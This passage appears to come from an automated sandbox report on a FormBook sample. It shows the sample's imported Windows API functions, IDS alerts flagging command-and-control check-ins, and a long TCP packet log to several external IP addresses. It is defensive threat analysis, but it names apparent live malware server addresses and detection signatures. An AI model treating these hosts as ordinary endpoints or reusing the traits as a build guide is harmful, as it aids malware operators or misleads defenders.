                                                      USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                      GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                      COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                      ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                      OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                      Possible Origin

                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-12-13T13:18:12.563243+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2449777103.23.149.2880TCP
                                                      2024-12-13T13:18:29.342602+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.244978184.32.84.3280TCP
                                                      2024-12-13T13:18:32.027554+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.244978584.32.84.3280TCP
                                                      2024-12-13T13:18:33.730010+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.244978684.32.84.3280TCP
                                                      2024-12-13T13:18:37.445528+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.244978884.32.84.3280TCP
                                                      2024-12-13T13:18:44.629294+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2449789172.67.155.21480TCP
                                                      2024-12-13T13:18:47.329255+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2449790172.67.155.21480TCP
                                                      2024-12-13T13:18:48.604997+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2449791172.67.155.21480TCP
                                                      2024-12-13T13:18:52.731892+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2449792172.67.155.21480TCP
                                                      2024-12-13T13:19:00.074872+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2449793199.59.243.22780TCP
                                                      2024-12-13T13:19:02.748122+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2449794199.59.243.22780TCP
                                                      2024-12-13T13:19:04.476937+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2449795199.59.243.22780TCP
                                                      2024-12-13T13:19:08.144035+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2449796199.59.243.22780TCP
                                                      2024-12-13T13:19:15.104234+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2449797199.59.243.22780TCP
                                                      2024-12-13T13:19:17.766303+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2449799199.59.243.22780TCP
                                                      2024-12-13T13:19:19.611952+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.2449801199.59.243.22780TCP
                                                      2024-12-13T13:19:23.813931+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.2449803199.59.243.22780TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 13, 2024 13:18:10.853281975 CET4977780192.168.2.24103.23.149.28
                                                      Dec 13, 2024 13:18:10.973632097 CET8049777103.23.149.28192.168.2.24
                                                      Dec 13, 2024 13:18:10.973752975 CET4977780192.168.2.24103.23.149.28
                                                      Dec 13, 2024 13:18:10.985869884 CET4977780192.168.2.24103.23.149.28
                                                      Dec 13, 2024 13:18:11.105835915 CET8049777103.23.149.28192.168.2.24
                                                      Dec 13, 2024 13:18:12.562987089 CET8049777103.23.149.28192.168.2.24
                                                      Dec 13, 2024 13:18:12.563091040 CET8049777103.23.149.28192.168.2.24
                                                      Dec 13, 2024 13:18:12.563242912 CET4977780192.168.2.24103.23.149.28
                                                      Dec 13, 2024 13:18:12.567729950 CET4977780192.168.2.24103.23.149.28
                                                      Dec 13, 2024 13:18:12.687436104 CET8049777103.23.149.28192.168.2.24
                                                      Dec 13, 2024 13:18:28.121227980 CET4978180192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:28.241050959 CET804978184.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:28.243556023 CET4978180192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:28.271305084 CET4978180192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:28.392421007 CET804978184.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:29.342545033 CET804978184.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:29.342602015 CET4978180192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:29.781531096 CET4978180192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:29.901572943 CET804978184.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:30.806364059 CET4978580192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:30.926476955 CET804978584.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:30.926592112 CET4978580192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:30.945507050 CET4978580192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:31.065479040 CET804978584.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:32.027436018 CET804978584.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:32.027554035 CET4978580192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:32.455411911 CET4978580192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:32.575212955 CET804978584.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.471445084 CET4978680192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:33.592283010 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.594007015 CET4978680192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:33.608782053 CET4978680192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:33.729629993 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.729666948 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.729695082 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.729747057 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.729774952 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.729962111 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.729993105 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.730010033 CET4978680192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:33.730117083 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.730194092 CET4978680192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:33.730257988 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.730284929 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.730423927 CET4978680192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:33.850111008 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.850155115 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.850183964 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.850193977 CET4978680192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:33.850233078 CET4978680192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:33.850239038 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.850250959 CET4978680192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:33.850294113 CET4978680192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:33.850753069 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.850795984 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:33.890871048 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:34.019323111 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:34.692732096 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:34.692827940 CET4978680192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:35.142658949 CET4978680192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:35.262727976 CET804978684.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:36.157857895 CET4978880192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:36.278362036 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:36.278579950 CET4978880192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:36.288033009 CET4978880192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:36.407958031 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:37.445281982 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:37.445369005 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:37.445426941 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:37.445461988 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:37.445497990 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:37.445530891 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:37.445528030 CET4978880192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:37.445569038 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:37.445585012 CET4978880192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:37.445602894 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:37.445610046 CET4978880192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:37.445640087 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:37.445652962 CET4978880192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:37.445673943 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:37.445775032 CET4978880192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:37.462639093 CET4978880192.168.2.2484.32.84.32
                                                      Dec 13, 2024 13:18:37.582732916 CET804978884.32.84.32192.168.2.24
                                                      Dec 13, 2024 13:18:42.983072996 CET4978980192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:43.103749037 CET8049789172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:43.103847027 CET4978980192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:43.127372026 CET4978980192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:43.247188091 CET8049789172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:44.629293919 CET4978980192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:44.714015961 CET8049789172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:44.714637041 CET8049789172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:44.714750051 CET4978980192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:44.714778900 CET4978980192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:44.749164104 CET8049789172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:44.749900103 CET4978980192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:45.656414986 CET4979080192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:45.776310921 CET8049790172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:45.776510000 CET4979080192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:45.816857100 CET4979080192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:45.936892986 CET8049790172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:47.329255104 CET4979080192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:47.379065037 CET8049790172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:47.379159927 CET4979080192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:47.379254103 CET8049790172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:47.379306078 CET4979080192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:47.449363947 CET8049790172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:47.449476004 CET4979080192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.341885090 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.461997032 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.462249994 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.484707117 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.604863882 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.604912996 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.604994059 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.604996920 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.605024099 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.605051041 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.605077028 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.605077982 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.605104923 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.605110884 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.605125904 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.605155945 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.605159044 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.605186939 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.605212927 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.605221987 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.605237007 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.605261087 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.725231886 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.725272894 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.725356102 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.725385904 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.725415945 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.725469112 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.725497007 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.725547075 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:48.766958952 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:48.887044907 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:49.997337103 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:50.117885113 CET8049791172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:50.118001938 CET4979180192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:51.015155077 CET4979280192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:51.134999037 CET8049792172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:51.135248899 CET4979280192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:51.145190001 CET4979280192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:51.265666962 CET8049792172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:52.731097937 CET8049792172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:52.731813908 CET8049792172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:52.731892109 CET4979280192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:52.736078024 CET4979280192.168.2.24172.67.155.214
                                                      Dec 13, 2024 13:18:52.856043100 CET8049792172.67.155.214192.168.2.24
                                                      Dec 13, 2024 13:18:58.858266115 CET4979380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:18:58.978131056 CET8049793199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:18:58.978265047 CET4979380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:18:58.996330023 CET4979380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:18:59.116588116 CET8049793199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:00.074666977 CET8049793199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:00.074754000 CET8049793199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:00.074773073 CET8049793199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:00.074872017 CET4979380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:00.076297998 CET4979380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:00.511780024 CET4979380192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:01.521393061 CET4979480192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:01.641305923 CET8049794199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:01.641459942 CET4979480192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:01.662595987 CET4979480192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:01.783415079 CET8049794199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:02.747889042 CET8049794199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:02.747917891 CET8049794199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:02.747939110 CET8049794199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:02.748121977 CET4979480192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:02.748121977 CET4979480192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:03.186918020 CET4979480192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:04.216978073 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:04.338141918 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.338263035 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:04.356589079 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:04.476762056 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.476785898 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.476799965 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.476813078 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.476843119 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.476855993 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.476870060 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.476896048 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.476907969 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.476937056 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:04.477005959 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:04.596522093 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.596688032 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:04.596976042 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.597007036 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.597042084 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.597042084 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:04.597057104 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:04.597084999 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:04.597115040 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.597167969 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:04.597245932 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.597276926 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.639204025 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:04.759457111 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:05.742974997 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:05.743029118 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:05.743072033 CET8049795199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:05.743145943 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:05.743195057 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:05.875988960 CET4979580192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:06.925023079 CET4979680192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:07.045919895 CET8049796199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:07.046058893 CET4979680192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:07.058255911 CET4979680192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:07.178236008 CET8049796199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:08.143765926 CET8049796199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:08.143809080 CET8049796199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:08.143826962 CET8049796199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:08.144035101 CET4979680192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:08.147918940 CET4979680192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:08.267827034 CET8049796199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:13.883632898 CET4979780192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:14.003627062 CET8049797199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:14.003721952 CET4979780192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:14.020610094 CET4979780192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:14.140683889 CET8049797199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:15.100106955 CET8049797199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:15.100208044 CET8049797199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:15.100220919 CET8049797199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:15.104233980 CET4979780192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:15.530750036 CET4979780192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:16.549424887 CET4979980192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:16.669254065 CET8049799199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:16.669336081 CET4979980192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:16.684420109 CET4979980192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:16.804214001 CET8049799199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:17.765785933 CET8049799199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:17.765820026 CET8049799199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:17.765862942 CET8049799199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:17.766303062 CET4979980192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:18.325392962 CET4979980192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.350744963 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.470844984 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.475116014 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.491897106 CET4980180192.168.2.24199.59.243.227
                                                      Dec 13, 2024 13:19:19.611835003 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.611903906 CET8049801199.59.243.227192.168.2.24
                                                      Dec 13, 2024 13:19:19.611913919 CET8049801199.59.243.227192.168.2.24
